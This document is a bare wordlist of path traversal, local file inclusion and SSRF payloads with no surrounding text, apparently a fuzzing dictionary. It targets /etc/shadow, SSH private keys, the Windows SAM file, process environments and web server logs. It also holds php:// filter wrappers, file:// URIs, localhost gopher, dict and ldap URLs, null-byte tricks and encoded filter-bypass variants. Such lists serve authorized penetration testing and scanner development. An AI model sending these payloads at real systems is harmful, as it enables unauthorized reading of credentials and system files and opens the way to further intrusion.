../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/group
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/issue
../../../../../../../../../../../../etc/motd
../../../../../../../../../../../../etc/os-release
../../../../../../../../../../../../etc/resolv.conf
../../../../../../../../../../../../etc/ssh/sshd_config
../../../../../../../../../../../../home/user/.ssh/id_rsa
../../../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/nginx/access.log
../../../../../../../../../../../../var/log/syslog
../../../../../../../../../../../../var/log/auth.log
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/version
../../../../../../../../../../../../proc/cmdline
../../../../../../../../../../../../proc/mounts
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\boot.ini
C:\Windows\repair\SAM
C:\inetpub\logs\LogFiles\W3SVC1\u_ex150101.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\xampp\apache\logs\access.log
C:\wamp\logs\apache_access.log
..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\..\..\Windows\repair\SAM
/etc/passwd%00
/etc/passwd\0
/etc/passwd%2500
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd\0
../../../../../../../../../../../../etc/passwd%2500
C:\Windows\win.ini%00
C:\Windows\win.ini\0
C:\Windows\win.ini%2500
..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini%00
..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini\0
..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini%2500
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../../../../../../../../../../etc/passwd
php://filter/read=string.rot13/resource=index.php
php://filter/read=string.rot13/resource=../../../../../../../../../../../../etc/passwd
php://input
php://stdin
php://stdout
php://stderr
php://memory
php://temp
file:///etc/passwd
file:///etc/shadow
file:///etc/group
file:///etc/hosts
file:///etc/issue
file:///etc/motd
file:///etc/os-release
file:///etc/resolv.conf
file:///etc/ssh/sshd_config
file:///home/user/.ssh/id_rsa
file:///var/log/apache2/access.log
file:///var/log/apache/access.log
file:///var/log/httpd/access_log
file:///var/log/nginx/access.log
file:///var/log/syslog
file:///var/log/auth.log
file:///proc/self/environ
file:///proc/version
file:///proc/cmdline
file:///proc/mounts
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Windows/win.ini
file:///C:/boot.ini
file:///C:/Windows/repair/SAM
file:///C:/inetpub/logs/LogFiles/W3SVC1/u_ex150101.log
file:///C:/Program Files/Apache Group/Apache/logs/access.log
file:///C:/xampp/apache/logs/access.log
file:///C:/wamp/logs/apache_access.log
http://127.0.0.1/
http://localhost/
https://127.0.0.1/
https://localhost/
ftp://127.0.0.1/
ftp://localhost/
dict://127.0.0.1:11211/
gopher://127.0.0.1:25/
ldap://127.0.0.1:389/
tftp://127.0.0.1:69/
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cWindows%255cwin.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cwin.ini
....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....\\....\\....\\....\\....\\....\\....\\....\\....\\....\\....\\....\\Windows\\win.ini
..././..././..././..././..././..././..././..././..././..././..././..././etc/passwd
...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\Windows\\win.ini
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\etc\passwd
